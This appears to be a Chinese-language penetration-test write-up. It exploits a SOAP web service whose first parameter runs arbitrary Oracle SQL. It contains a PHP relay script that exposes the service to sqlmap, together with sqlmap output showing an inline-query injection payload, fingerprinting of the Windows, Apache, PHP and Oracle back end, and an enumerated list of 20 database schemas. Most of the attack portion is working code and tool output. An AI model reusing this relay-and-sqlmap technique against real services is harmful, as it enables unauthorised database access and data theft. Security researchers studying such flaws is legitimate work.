先以本地为例
http://localhost:8088/ws
code 区域
http://localhost:8088/ws/query?wsdl
竟然提示
code 区域
Unmarshalling Error: unexpected element (uri:"http://**.**.**.**/", local:"arg0"). Expected elements are <{}arg1>,<{}arg0>
搜索
提示是参数问题
改代码肯定是不行的
那就改参数吧
ORA-00900: 无效 sql 语句
看来是可以的
更改第一个参数
code 区域
select SYS_CONTEXT('USERENV','CURRENT_USER') from dual
查看用户量
任意SQL执行
继续中转
code 区域
$arg0=$_GET['sql'];
header("content-type:text/html;charset=utf-8");
try {
$client = new SoapClient('http://localhost:8088/ws/query?wsdl');
$xml = "
1
1
";
$result=$client->queryBy(array('arg0'=>$arg0,'arg1'=>'1'));
echo $result->return ;//显示结果
} catch (SOAPFault $e) {
print_r('Exception:'.$e);
}
?>
SQL注入
code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sql
Type: inline query
Title: Oracle inline queries
Payload: sql=(SELECT CHR(113)||CHR(115)||CHR(112)||CHR(99)||CHR(113)||(SELEC
T (CASE WHEN (8499=8499) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(101)||CHR(
112)||CHR(97)||CHR(113) FROM DUAL)
---
[15:39:49] [INFO] the back-end DBMS is Oracle
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: Oracle
code 区域
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB